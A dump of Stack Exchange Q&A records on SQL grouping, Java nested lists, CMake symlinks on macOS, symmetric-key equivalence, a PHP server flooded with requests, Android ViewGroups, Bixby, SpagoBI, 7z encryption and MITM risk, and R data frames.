Try the below one, where we are trying to sum up all the pledged money for each country.\n<code>SELECT country.name, sum(campaign.pledged) country_pledged\nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name ORDER BY campaign.pledged DESC\n<\/code>\nComment: Isaac sorry to be a hassle but i have one more question I'm stuck on, I need to see the top performing categories. can you spot anything wrong with this query, I have tried a lot of varients. I used your above answer and got this. SELECT country.name, sum(campaign.pledged) country_pledged\nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name\nAnswer: You need to either group by all columns (like <code>GROUP BY campaign.country_id, campaign.pledged, country.id, country.name<\/code>) or use aggregate functions in SELECT list.\nComment: Hmm, this does not make the country name or id columns stack so that i can see who raised the most money it just leaves the table the same as before.\nAnswer: Below SQL should work. Please note your GROUP BY and SELECT clause should be in sync for aggregation to work.\n<code>SELECT country.name, count(1) ccount \nFROM campaign LEFT JOIN country ON campaign.country_id = country.id\nGROUP BY country.name ORDER BY 2 DESC \n<\/code>\n","meta":{"source":"stackoverflow","title":"I am getting an error 1055 trying to group after a join","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set and Get Nested List Element into a single list\n\nQuestion: I want to set some elements in an ArrayList as this format.\n[ 1, 2, [3, 4], 5, [6, 7, 8], 9]\nAnd I also try to get elements from the above format and it should convert all nested element list into a single element list.\ne.g. [1, 2, 3, 4, 5, 6, 7, 8, 9]\nCurrently, I am trying to set elements in my list.\n<code> List<Object> list = new ArrayList<>();\n List<Integer> intList = new ArrayList<>();\n List<Integer> intList2 = new ArrayList<>();\n\n intList.add(3);\n intList.add(4);\n\n intList2.add(6);\n intList2.add(7);\n intList2.add(8);\n\n list.add(1);\n list.add(2);\n list.addAll(intList);\n list.add(5);\n list.addAll(intList2);\n list.add(9);\n<\/code>\nAfter execution of above code in debug mode. I checked the list and it's storing element as this [1, 2, 3, 4, 5, 6, 7, 8, 9] instead of this [ 1, 2, [3, 4], 5, [6, 7, 8], 9].\nComment: don't use `addAll()` when adding the `intList` and `intList2`\nComment: Did you read the documentation for the `addAll` method?\nComment: addAll appends all elements from intList to end of list, i.e. list.addAll(intList1) is like individually adding each element from intList1 to end of list\nComment: You need to create nested `List` object that should look like `List> lists`, and add to it your `list`, `intList` and `intList2`\nComment: I changed my addAll() method into add() method and now my list storing the elements in this format [ 1, 2, [3, 4], 5, [6, 7, 8], 9].\nComment: you need to maintain input order or need the sorted list? i will suggest go for recursive @ManishVerma\nComment: @Deadpool i need sorted list.\nComment: check my updated code, first combine everything into single list and then sort it @ManishVerma\nComment: @Deadpool thanks sir.\nAnswer: <code>addAll()<\/code> method just add items from parameter list to origin one one by one. 
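(In other words, with the lists in the question, <code>list.addAll(intList)<\/code> copies 3 and 4 in as individual elements, so <code>list<\/code> ends up holding [1, 2, 3, 4, ...] rather than [1, 2, [3, 4], ...] - the nesting is lost.)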
So you need regular <code>add()<\/code> method:\n<code>...\nlist.add(intList);\nlist.add(5);\nlist.add(intList2);\n...\n<\/code>\nThen if you want to convert it to single list you can use stream <code>flatMap<\/code> method. Note: since you have <code>List<Object><\/code> casting is needed: \n<code>List<Integer> collect = list.stream()\n .flatMap(o -> {\n if (o instanceof ArrayList)\n return ((ArrayList<Integer>) o).stream();\n return Stream.of((Integer)o);\n })\n .collect(toList());\n\nSystem.out.println(collect);\n<\/code>\nOr use <code>List<List<Integer>><\/code> instead of <code>List<Object><\/code> how it was mentioned in comments. Then the second part will be more concise\nAnswer: You can change the type of list from <code>List<Object><\/code> to <code>List<List<Integer>><\/code> if you want to operate on Integers, and then add List of Integers to list instead of single Integer, to access create a stream out of list and flatMap.\n<code>List<List<Integer>> list = new ArrayList();\nList<Integer> intList = new ArrayList();\nList<Integer> intList2 = new ArrayList();\n\nintList.add(3);\nintList.add(4);\n\nintList2.add(6);\nintList2.add(7);\nintList2.add(8);\n\nlist.add(Arrays.asList(1));\nlist.add(Arrays.asList(2));\nlist.add(intList);\nlist.add(Arrays.asList(5));\nlist.add(intList2);\nlist.add(Arrays.asList(9));\n\nList<Integer> flatList = list.stream().flatMap(List::stream).collect(Collectors.toList())\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set and Get Nested List Element into a single list","dup_signals":{}},"subset":"stackexchange"} +{"text":"cmake installer for Mac fails to create \/usr\/bin symlinks\n\nQuestion: Try to install CMake cmake-184.108.40.206-Darwin64-universal.dmg on OS X 10.9.3\nI removed the old version from Application folder and delete ccmake, cmake, cmake-gui etc in usr\/bin.\nBut get \"Failed create symlink installation may be incomplete: \/usr\/bin\/cpack\" and other error messages.\nPlease let me know if any suggestion or question.\nThank you for precious time on my question.\nComment: You normally need root access for installations on Macs... I suggest you do `su` and enter the root password and then repeat the installation if it is Terminal-driven.\nComment: Thanks, Mark. I tried to install cmake dmg from the command line by following this link.\nhttp:\/\/apple.stackexchange.com\/questions\/73926\/is-there-a-command-to-install-a-dmg\nBut GOT \"Error trying to locate volume at \/Applications\/\"\nCan I have one more suggestion? Thank you!\nComment: I think @ComicSansMS has made a great suggestion, run `ls -l \/usr\/bin | grep -i cmake` and remove all the links with `sudo rm \/usr\/bin\/something`. Then re-try installing, but edit your question and update it with all the outputs you see so folks can assist you.\nComment: Sorry for the late update. With @ComicSansMS 's suggestion (remove all the links), then installation works!. Thank you ComicSansMS and Mark Setchell\nComment: Try this solution explained in this thread :\n\nhttp:\/\/stackoverflow.com\/questions\/13442096\/cmake-2-8-10-installation-for-mac-os-x-fails-creating-symlinks\nAnswer: CMake 3.0 does not seem to come with an installer any longer. So I ran into a similar issue. Like @ComicSansMS said you need to first remove the symlinks using <code>sudo rm<\/code>. 
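For example, something along these lines (adjust the list to whatever links <code>ls -l \/usr\/bin<\/code> shows pointing at the old CMake install - the exact set of links can vary between versions):\n<code>cd \/usr\/bin\nsudo rm -f ccmake cmake cmake-gui cmakexbuild cpack ctest\n<\/code>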
Then you can run the gui with\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake<\/code> and use the Tools -> Install For Command Line Use menu item.\nFrom some new 3.x version you have to use this command to create symlinks:\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n<\/code>\nNote option in menu now gives only this instruction and other possible choices.\nComment: This way worked for me. It seems like must use sudo to run it. It didn't work when I ran it from the Applications.\nComment: Really helpful! If the question hadn't asked specifically about v. 220.127.116.11 I would have suggested updating by making this the answer. Thanks.\nAnswer: In the latest versions the install procedure is simple, in the terminal simply type:\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n<\/code>\nAnd the soft links will be automatically generated.\nTested with <code>cmake version 3.3.2<\/code> and <code>cmake version 3.8.0<\/code>\n\nIf you fear you might have remaining links from a previous version you can remove them before installing the new version:\n<code>cd \/usr\/bin; sudo rm ccmake cmake cmake-gui cmakexbuild cpack ctest\n<\/code>\n\nOtherwise for older versions you should start the application with an account with admin privileges for the install to work. i.e.:\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake\n<\/code>\nAnswer: As said earlier, launch the GUI in sudo mode. Open a terminal and type:\n<code>sudo \/Applications\/CMake.app\/Contents\/MacOS\/CMake\n<\/code>\nthen in the GUI, go to Tools menu and Install For Command Line Use and press the Install Command Line Links button. The terminal will show:\n<code>ln -s [\/Applications\/CMake.app\/Contents\/bin\/ccmake] [\/usr\/bin\/ccmake]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmake] [\/usr\/bin\/cmake]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmake-gui] [\/usr\/bin\/cmake-gui]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cmakexbuild] [\/usr\/bin\/cmakexbuild]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/cpack] [\/usr\/bin\/cpack]\nln -s [\/Applications\/CMake.app\/Contents\/bin\/ctest] [\/usr\/bin\/ctest]\n<\/code>\nand here you are. Tested with cmake-3.1.0-rc2.\nComment: At least as of 3.3.0-rc3 the \"Install For Command Line Use\" menu no longer exists.\nAnswer: This tends to happen to me as well from time to time.\nThe problem is basically that the symlinks from the previous installation are not cleaned up when removing CMake from Applications and now the installer has trouble updating them to the new version.\nThe easiest fix here is to manually remove those links from <code>\/usr\/bin<\/code> and re-run the installer. IIRC it's at least <code>cmake<\/code>, <code>ccmake<\/code>, <code>cmake-gui<\/code>, <code>cpack<\/code> and <code>ctest<\/code> that need removing. Best way is to do a <code>ls -l \/usr\/bin<\/code> from the console and <code>grep<\/code> for all the links pointing to the old CMake installation directory.\nComment: Sorry, ComicSansMS. For some reason it still doesn't work. 
But thank you so much for suggestion!\nComment: Thanks; without commas, plus cmakexbuild: cd \/usr\/bin ; sudo rm cmake ccmake cmake-gui cpack ctest cmakexbuild\nAnswer: There is a option in \n<code>Cmake GUI->Tools->How to install for command line use\n<\/code>\nwhich shows options\n<code>One may add CMake to the PATH:\n\n PATH=\"\/Applications\/CMake.app\/Contents\/bin\":\"$PATH\"\n\nOr, to install symlinks to '\/usr\/local\/bin', run:\n\n sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\n\nOr, to install symlinks to another directory, run:\n\n sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/path\/to\/bin\n<\/code>\nIn which first option worked for me.\nComment: Looks it's the one for ver 3.6.2\nAnswer: In the CMake 3.3.0 there is no longer the option Install For Command Line. Below is how I did it.\nI've downloaded the dmg file and copied to Applications folder. But I had to add the path to the binary to the PATH environment variable. This is the complete step-by-step.\n\nDownload CMake dmg from official website (http:\/\/www.cmake.org);\nOpen the dmg file. Copy the CMake executable to the Applications folder;\nOpen a terminal and type \"cd ~\" (to go to your home folder);\nOpen the file .bash_profile (if it does not exist, create it with \"touch .bash_profile\");\nInside .bash_profile file, insert the following line: \n\nexport PATH=\"\/Applications\/CMake.app\/Contents\/bin\/:$PATH\"\n(This will add the binary of CMake to yout PATH variable)\n\nSave the .bash_profile file and exit;\nBack to the terminal, type \"source .bash_profile\", to update the PATH variable.;\nReady to go! Try to compile again :)\n\nThe good part of adding it to PATH is that it will work every time you restart your computer.\nComment: You can use \"cd\" alone if you want to go your home folder.\nAnswer: very simple,\ninstall the .dmg file then open,\ntools->How to install for Command line use\nyou can find:\nOne may add CMake to the PATH:\nPATH=\"\/Applications\/CMake.app\/Contents\/bin\":\"$PATH\"\nOr, to install symlinks to '\/usr\/local\/bin', run:\nsudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install\nOr, to install symlinks to another directory, run:\nsudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/path\/to\/bin\nAnswer: Opening the Applications folder in a terminal \n<code>cd \/\ncd Applications\/\n<\/code>\nthen doing:\n<code>sudo bash\nCMake.app\/Contents\/bin\/cmake-gui\n<\/code>\nThen run from the CMake GUI:\n \"Tools->Install For Command Line Use\"\nworks OK for me.\nAnswer: If you want to install on OSX 10.11 it needs to be installed to \/usr\/local\/bin ( just \/usr\/bin will not work! ). I couldn't get that to work with the cmake I had installed (3.2.1). After downloading the latest version (3.6.1) and using this commandline it worked. 
No need to go to the gui and click on 'install commandline tools', it just does it instantly.\nnote: it might also work without specifying \/usr\/local\/bin on cmake-3.6.1 - haven't tested that.\n<code>sudo \"\/Applications\/CMake.app\/Contents\/bin\/cmake-gui\" --install=\/usr\/local\/bin\n<\/code>\nAnswer: Try use sudo start cmake-gui, and choose folder to \/usr\/local\/bin instead the default \/usr\/bin when install command line\nI was success\n","meta":{"source":"stackoverflow","title":"cmake installer for Mac fails to create \/usr\/bin symlinks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Special equivalent key in symmetric encryption\n\nQuestion: Let $k$ and $k'$ be two keys of symmetric encryption such that for some $m$ we have $\\operatorname{Enc}_k(m)=\\operatorname{Enc}_{k'}(m)$. Is it possible to exist a plain text $m'$ such that $\\operatorname{Enc}_k(m') \\neq \\operatorname{Enc}_{k'}(m')$.\nIn fact, is there exist a key which be equivalent only for special plain text?\nAnswer: Yes. Actually it is quite likely that there are quite a few such keys for block ciphers. That said, finding one takes a collision search which may take a lot of time, especially for ciphers with a large block size.\nProving that there are no other messages that permute to the same ciphertext may even be computationally infeasible.\nIt would not be a good property for a block cipher to have keys that are fully equivalent. It may not directly destroy all trust in the cipher but it would certainly raise a few eyebrows.\n","meta":{"source":"crypto.stackexchange","title":"Special equivalent key in symmetric encryption","dup_signals":{}},"subset":"stackexchange"} +{"text":"Someone is trying to hack my PHP server\n\nQuestion: Today, early in the morning. My dedicated server was slowing because there was numerous requests coming.\nOne error I remember is some message from MYSQL, it said something similar to, max_number_of_connections exceeded. \nIt felt weird because the site I'm working on isn't launched yet, this huge traffic was just unreasonable.\nWhen I went to see the numbers of users online, it was also huge. A same IP address was attempting to go to my links (like 1000 links \/ second). Most of them returned 404. I didn't save them nor I did remember the weird links were shown. 
\nI went to cPanel on my PHP server and saw that the error_log is huge (yesterday it was 4.0 KB):\n\nIt keeps on getting bigger. I was able to extract this sample; it seems to be the repeated pattern (only a few entries are shown here - the same two warnings alternate for the rest of the excerpt):\n<code>[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: feof() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4252\n[20-Aug-2014 20:49:58 Europe\/Vilnius] PHP Warning: fread() expects parameter 1 to be resource, boolean given in \/home\/george\/public_html\/includes\/functions.php on line 4254\n<\/code>\nIt seems like the error has been printed millions of times; it has made the error_log 1.7 GB so far.\nWhat can I do? Is there an easy way I could block an IP address that is using some software to disrupt my server?\nComment: Can you post some examples from the error log of the kinds of requests you're getting? Also this could indicate an issue with your application, if users can easily exhaust some particular resource from a relatively small number of requests then your application is vulnerable to a DoS attack. You might need to look for bottlenecks in your application, use resources more efficiently or restrict who can access certain functionality (eg. via a CAPTCHA).\nComment: Crashing or slowing? What do you mean 'users available'? \"Inserting links\" into your server? What does that mean? You can block a single IP address using your server's firewall, assuming your hosting provider allows you access to that functionality (you'd have to ask them, that'd be their policy, not a tech issue).\nComment: Log rotation is your good friend.\nComment: @georgechalhoub Regarding auto-banning IP addresses or ranges which are the source of an unreasonable amount of requests, check [fail2ban](http:\/\/www.fail2ban.org\/wiki\/index.php\/Main_Page).\nComment: I'm assuming your server is hosted with an ISP. Check with the ISP regarding how to block IPs.\nComment: @Kitsune I edited my answer. I know how to block an IP address, this is not my issue. They can mask the IP and still attempt to hack. I want to know what is vulnerable in my site and fix it. I also want to know if I can automatically block an IP trying to go to an unreasonable amount of links in my server.\nComment: @georgechalhoub use FTP then use tail or similar on it.\nComment: @thexacre The file is huge. cPanel is crashing when trying to view it. I may be able to download it but it will take ages to finish.\nComment: @georgechalhoub, I was able to get some code from the error_log.\nAnswer: I think there are bigger issues at play; for one, your logs seem to suggest there is an issue with your application caused by a file which can't be opened. The fact that there were dozens of logs all within the same second implies that this error is also occurring multiple times in the same request. This may or may not be contributing to your site being slow; sorting these out is probably a question for a different SE site.\nAs I mentioned in my comment above, the issue might also be more to do with your application than (probably) bots making requests to your site. If a certain resource can be exhausted by a relatively small volume of requests then your application is vulnerable to a DOS attack. You might need to look for bottlenecks in your application, use resources more efficiently or restrict who can access certain functionality (eg. via a CAPTCHA).\nIn terms of mitigation, here are some options:\n\nBlock the IP, preferably via an external firewall but failing that then you should be able to use a .htaccess rule. If this is a targeted attack and not an isolated bot malfunctioning then this will probably be a waste of time because the attacker will just change their IP.\nAdd a web application firewall (WAF). CloudFlare is a relatively popular product which includes a WAF and can be used for free.\nContact your web host. Seeing as you're running cPanel I'm assuming you're just a customer on shared hosting. Your host should be responsible for ensuring log rotation is working and may also be able to assist in blocking bad traffic.\n","meta":{"source":"security.stackexchange","title":"Someone is trying to hack my PHP server","dup_signals":{}},"subset":"stackexchange"}
+{"text":"Susceptibility of 7z encrypted archive files to man in the middle attacks\n\nQuestion: Given:\n\nA file (assume 1 GB in size) is encrypted along with filenames using 7zip into a 7z archive using AES-256\nThe file is uploaded to a cloud storage service such as those offered by Google, Amazon, or Microsoft\nThe file is downloaded by a peer on a separate network and the peer is offered the password in a secure manner\n\nAcknowledgements:\n\nI realize that if someone got the password then their job would be easy\nI also realize that the security is only as great as the developer who created 7z made it\n
I may be able to download it but it will take ages to finish.\nComment: @georgechalhoub use FTP then use tail or similar on it.\nComment: @thexacre, I was able to get some code from the error_log.\nAnswer: I think there are bigger issues at play; for one, your logs seem to suggest there is an issue with your application caused by a file which can't be opened. The fact that there were dozens of logs all within the same second implies that this error is also occurring multiple times in the same request. This may or may not be contributing to your site being slow; sorting these out is probably a question for a different SE site.\nAs I mentioned in my comment above, the issue might also be more to do with your application than (probably) bots making requests to your site. If a certain resource can be exhausted by a relatively small volume of requests then your application is vulnerable to a DoS attack. You might need to look for bottlenecks in your application, use resources more efficiently or restrict who can access certain functionality (eg. via a CAPTCHA).\nIn terms of mitigation, here are some options:\n\nBlock the IP, preferably via an external firewall, but failing that you should be able to use a .htaccess rule. If this is a targeted attack and not an isolated bot malfunctioning then this will probably be a waste of time because the attacker will just change their IP.\nAdd a web application firewall (WAF). CloudFlare is a relatively popular product which includes a WAF and can be used for free.\nContact your web host. Seeing as you're running cPanel, I'm assuming you're just a customer on shared hosting. Your host should be responsible for ensuring log rotation is working and may also be able to assist in blocking bad traffic.\n","meta":{"source":"security.stackexchange","title":"Someone is trying to hack my PHP server","dup_signals":{}},"subset":"stackexchange"} +{"text":"android: a newby GUI question - how to declare viewGroup, without layout XML file?\n\nQuestion: In the app I'm struggling with, I have a custom view.\nI cannot declare it in a layout XML file, because I'm going to use it from the activity that holds my custom view instance and I need to have access to it (cannot override findViewById...).\nTherefore I decided to declare all of the GUI elements in the Activity.\nBut I simply cannot make a single step forward, since I cannot even instantiate a ViewGroup...\nThis is what I'm trying:\n<code>@Override\npublic void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n ViewGroup vg = new ViewGroup(this.getApplicationContext());\n\n setContentView(vg);\n\n}\n<\/code>\nand I get 'Cannot instantiate ViewGroup'...\nCan someone give a straightforward example of how to declare a ViewGroup that holds views?\nThe documentation of the class is also not very beginner-friendly... all the examples are focused on describing the layout in a layout XML file...?\nI appreciate your effort in giving an example! \nAnswer: <code>ViewGroup<\/code> is an abstract class; you cannot instantiate it. It defines a type of class that acts as a container for other views. In other words, layouts like <code>LinearLayout<\/code> or <code>RelativeLayout<\/code> are ViewGroups. Thus, you could do something like this: \n<code> @Override\n public void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n\n LinearLayout vg = new LinearLayout(this);\n\/\/ set the LayoutParams the way you want.\n\/\/ and add textviews, imageviews, ... 
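for example:\n TextView tv = new TextView(this); \/\/ illustrative child view; any View subclass works\n tv.setText(\"Hello\");\n vg.addView(tv);\n\/\/ add more views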
here for instance.\n setContentView(vg);\n\n }\n<\/code>\nFor the <code>LayoutParams<\/code>, I think you should start with LayoutParams.Fill_parent\nComment: Thank you very much! Sorry for the enormous ignorance that I showed - I didn't notice ViewGroup was and abstract class...\nComment: NO problem. Everyone does mistakes ;)\n","meta":{"source":"stackoverflow","title":"android: a newby GUI question - how to declare viewGroup, without layout XML file?","dup_signals":{}},"subset":"stackexchange"} +{"text":"why can't a structure have more than one property of type \"text\"\n\nQuestion: \n\nThis doesn't seem right. Why can't a structure have more than one property per type?\nAnswer: The IDE error message is valid.\nDue to the design of Bixby platform (modeling and action planing requires unique concept type), a structure can have at most 1 concept of each type. (The concept could be <code>max(Many)<\/code> for an array) \nOne general rule is to name each of your concept and not directly use any core base type. It might seems unnecessary at the beginning, but soon it will start making sense and making things easier for complex capsules. \nTo fix above error, create a Text type BixbyUserId, and replace with: \n<code>property (bixbyuserid) {\n type (BixbyUserId) \n min (Optional) max (One) \n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"why can't a structure have more than one property of type \"text\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"SpagoBI: End user customized front page\n\nQuestion: I have created a new user, with a new role and I want to configure the user front page. \nI added a document that the admin created, but when I login as my new user, I see a blanc page, I can't see the page content :(\nWhat have I missed, is there another privileges that I need to set to my user to be able to see the document created by the admin?\nThanks in advance for your help!\nAnswer: you have to enter as admin and then:\n1. enter the details of the user's role and enable required functionalities (documents browser, my data, my analysis, ...);\n2. enter Menu configuration and define menu items for user's role.\nAs an alternative, you can develop an external web application using REST API.\nBest regards\nDavide\nComment: Remember that the user home page is the first menu item\n","meta":{"source":"stackoverflow","title":"SpagoBI: End user customized front page","dup_signals":{}},"subset":"stackexchange"} +{"text":"Susceptibility of 7z encrypted archive files to man in the middle attacks\n\nQuestion: Given:\n\nA file (assume 1 GB in size) is encrypted along with filenames using 7zip into a 7z archive using AES-256\nThe file is uploaded to a cloud storage service such as those offered by Google, Amazon, or Microsoft\nThe file is downloaded by a peer on a separate network and the peer is offered the password in a secure manner\n\nAcknowledgements:\n\nI realize that if someone got the password then their job would be easy\nI also realize that the security is only as great as the developer who created 7z made it\nI went through as many similar topics as I could find on here and elsewhere about this and while similar questions have been asked, I don't believe the exact concerns here have been addressed so I hope this is not a duplicate.\n\nQuestions:\n\nDoes using a linux based operation to create such files offer more security than doing so with 7zip on Windows?\nHow susceptible would this kind of operation be to an attacker, government agency, etc... 
seeking to know what the contents of the archive are? Would that middle man need to intercept the entire file in order to potentially gain access to the contents?\nWhat other flaws may have been overlooked in this approach?\nAre there better alternatives that offer comparably equal ease of implementation?\nComment: The MITM attack would have to be done over whatever channel the key is exchanged through. You say it's a \"secure manner\", so whether or not MITM is a risk depends on how secure it exactly is.\nAnswer: Context\nWhat we have here is a symmetric encryption scheme implemented using 7z for encryption. Since I trust that, as you stated, the password is shared in a secure manner, we can consider it a pre-shared secret (at least pre-shared by the time of decryption). This means that the security of the scheme is dependent on the 7zip implementation of AES, etc.\nAlso, due to the nature of symmetric encryption with pre-shared secrets, an active attack (e.g. a man-in-the-middle attack) is no more useful than a passive eavesdropper.\n\nDoes using a linux based operation to create such files offer more security than doing so with 7zip on Windows?\n\nAs long as your system is not compromised, either system would be equally fine. Which one is less likely to be compromised, etc, is a different question\n\nHow susceptible would this kind of operation be to an attacker, government agency, etc... seeking to know what the contents of the archive are? Would that middle man need to intercept the entire file in order to potentially gain access to the contents?\n\nAs mentioned above, \"intercepting\" the file would be no better\/worse than passively observing it, so a gov't agency would be no better off than your cloud provider, etc.\nWhether they could (physically) compromise your devices, install keyloggers, use a $5 wrench to extract the password, etc, is a different question. How worrisome these threats are is up to you.\nCryptography-wise, the security is 100% dependent on the security of the encryption and the password. Since AES is pretty strong, I'd only worry about the password. (edit, thx @SteffenUllrich:) Since the password is being securely communicated, the only thing that you need to worry about is its strength. I recommend using a password manager to store and generate your password for the time between its creation and when it is sent to your friend\/coworker\/etc.\n\nWhat other flaws may have been overlooked in this approach?\n\n(edited in later:) As mentioned in the comments, you might want to look into how 7zip hashes passwords, etc.\n\nAre there better alternatives that offer comparably equal ease of implementation?\n\nOverall, I'd say that your current setup passes with flying colors. It's simple and uses established algorithms (i.e. AES).\nComment: It appears that 7zip [does not use a salt](https:\/\/crypto.stackexchange.com\/q\/30468\/54184), and most likely does not have any form of integrity such as an HMAC. Those are the main flaws in the setup that I can see.\nComment: Actually I'm not sure if that's still true, since https:\/\/github.com\/philsmd\/7z2hashcat mentions a salt. I guess I'll have to check the actual source code.\nComment: *\"I'd only worry about the password, which, as you said, is securely communicated and is therefore not a worry either.\"* - one can also communicate a weak password in a secure way. The security not only depends on the secure sharing of the password but also on the strength of the password itself. 
AES and KDF will not help much against brute-forcing if a weak password was used.\nComment: @SteffenUllrich oops, nice catch :)\n\nI didn't mean to phrase it that way, but after rereading my answer I now realize that I mistakenly assume that the password he is using is secure. \n\nI'll edit my post with better wording\nComment: Thanks for the input. I should have added the assumption that the password is strong and secure. Thanks for mentioning passive easvesdropping as well. That is really more of a concern than a man in the middle. Ultimately I think this set up is sufficient as well as I am not expecting an attack and am just seeking privacy.\nAnswer: While the answer provided by @user196499 is spot on the one thing i think should be discussed is time.\nSince your cryptographically secure archive has been created and placed online what is the allowable time it may remain secure?\nKey lifetimes should be implemented due to the fact that on a long enough timeline every keys security drops to 0.\nFactorization of a key (brute force), cryptanalysis of the algorithms output, side channel attacks in the cipher mode, iv weakness etc all play a part in the time of which the archive can be considered secure.\nAs mentioned, set a max on the key lifetime and if needed when implementing a new key reevaluate the mode of encryption being used; I.E. CBC, CTR , GCM etc\nComment: While key expiration is great for public keys where you don't want people to send you messages encrypted with a compromised key, etc, it still doesn't solve the problem of stuff already encrypted using the key (i.e. the files encrypted w\/ 7zip)\nComment: NIST SP 800-57 Pt. 1 Rev. 4 recommends a lifetime associated with the key. Asymmetric or symmetric keys are still keys and over time are indeed susceptible to attacks. Rotating a key would require a decryption, re encryption but further protects the resulting cipher text.\nAnswer: The underlying cipher is secure.\nHowever, a specific practical MITM attack on encrypted archives has been proposed: https:\/\/link.springer.com\/article\/10.1007%2Fs10207-006-0086-3\nThe attack consists of intercepting the archive and editing the header to change indicated compression mode, so that the archive decrypts correctly, but decompresses incorrectly. The recipient is then expected to send back the garbled file, which the attacker intercepts again, fixes the header, and gets the data.\nOf course, this isn't an attack on archives so much as it is an attack on unathenticated encryption in general. It also relies on highly reckless user behavior - but, if there are hundreds of recipients, it's conceivable that someone might do that, particularly if the MITM can also forge communications between the parties.\nThis scheme can be improved with encrypt-then-MAC authentication and ensuring the recipients verify the file before opening.\n","meta":{"source":"security.stackexchange","title":"Susceptibility of 7z encrypted archive files to man in the middle attacks","dup_signals":{}},"subset":"stackexchange"} +{"text":"Highlight values in a data frame in R\n\nQuestion: I have a database with rankings from three different methods. Note that some methods have similar values, for example for the first alternative we have two values equal to 1 and another with a value equal to 29. 
Therefore, I would like to know if there is any way to highlight the repeated values for the same line, who knows how to leave it in red or in another way of highlighting.\nCan you help me with this?\n<code>result<-structure(list(n = c(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, \n 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, \n 28, 29), M1 = c(29L, 1L, 28L, 27L, 25L, 26L, 24L, 20L, 21L, \n 22L, 23L, 15L, 12L, 17L, 18L, 19L, 16L, 13L, 14L, 5L, 6L, 7L, \n 8L, 9L, 10L, 11L, 4L, 2L, 3L), M2 = c(1, 29, 28, 27, 26, 25, \n 24, 23, 22, 21, 20, 15, 12, 19, 18, 17, 16, 14, 13, 11, 10, 9, \n 8, 7, 6, 5, 4, 3, 2), M3 = c(1L, 29L, 28L, 27L, 25L, 26L, 24L, \n 20L, 21L, 22L, 23L, 15L, 12L, 17L, 18L, 19L, 16L, 13L, 14L, 5L, 6L, 7L, 8L, 9L, 10L, 11L, 4L, 2L, 3L)), class = \"data.frame\", row.names = c(NA,-29L))\n\n> result\n n M1 M2 M3\n1 1 29 1 1\n2 2 1 29 29\n3 3 28 28 28\n4 4 27 27 27\n5 5 25 26 25\n6 6 26 25 26\n7 7 24 24 24\n8 8 20 23 20\n9 9 21 22 21\n10 10 22 21 22\n11 11 23 20 23\n12 12 15 15 15\n13 13 12 12 12\n14 14 17 19 17\n15 15 18 18 18\n16 16 19 17 19\n17 17 16 16 16\n18 18 13 14 13\n19 19 14 13 14\n20 20 5 11 5\n21 21 6 10 6\n22 22 7 9 7\n23 23 8 8 8\n24 24 9 7 9\n25 25 10 6 10\n26 26 11 5 11\n27 27 4 4 4\n28 28 2 3 2\n29 29 3 2 3\n<\/code>\nComment: You would have to define a custom `print` method taking advantage of the `crayon` package, which allows you to add color and other formatting to the text R console (only in RStudio). Quite a lot of work. It would be much easier to create a set of flag columns that parallel your data columns. Would that meet your needs?\nComment: Thanks for the answer @jdobres! I think so.\nAnswer: Colors are only available in the RStudio console through the <code>crayon<\/code> package, so you would need to write a whole custom print method, which is a fair bit of work. Instead, you could use the tidyverse packages to create a set of flag columns that make it easier to track the duplications:\n<code>library(tidyverse)\n\noutput <- result %>%\n pivot_longer(M1:M3) %>% \n group_by(n, value) %>% \n mutate(T_F = ifelse(n() > 1, 'T', 'F')) %>% \n pivot_wider(values_from = c(value, T_F), names_glue = '{name}_{.value}')\n\ncolnames(output) <- gsub('_value', '', colnames(output))\n\n n M1 M2 M3 M1_T_F M2_T_F M3_T_F\n <dbl> <dbl> <dbl> <dbl> <chr> <chr> <chr> \n 1 1 29 1 1 F T T \n 2 2 1 29 29 F T T \n 3 3 28 28 28 T T T \n 4 4 27 27 27 T T T \n 5 5 25 26 25 T F T \n 6 6 26 25 26 T F T \n 7 7 24 24 24 T T T \n 8 8 20 23 20 T F T \n 9 9 21 22 21 T F T \n10 10 22 21 22 T F T \n# \u2026 with 19 more rows \n<\/code>\nComment: Thanks for the answer! I think the way you did it, it's much better to check equal values. I just wish it could be adjusted the names, ie, not to be `value_M1`, leaving just `M1`. That goes for others. And in case of `is_dupe_M1`, leave `M1 (T\/F)`\nComment: Column names with spaces, parentheses, and slashes are not recommended, but I've reformatted the result to be closer to what you want. 
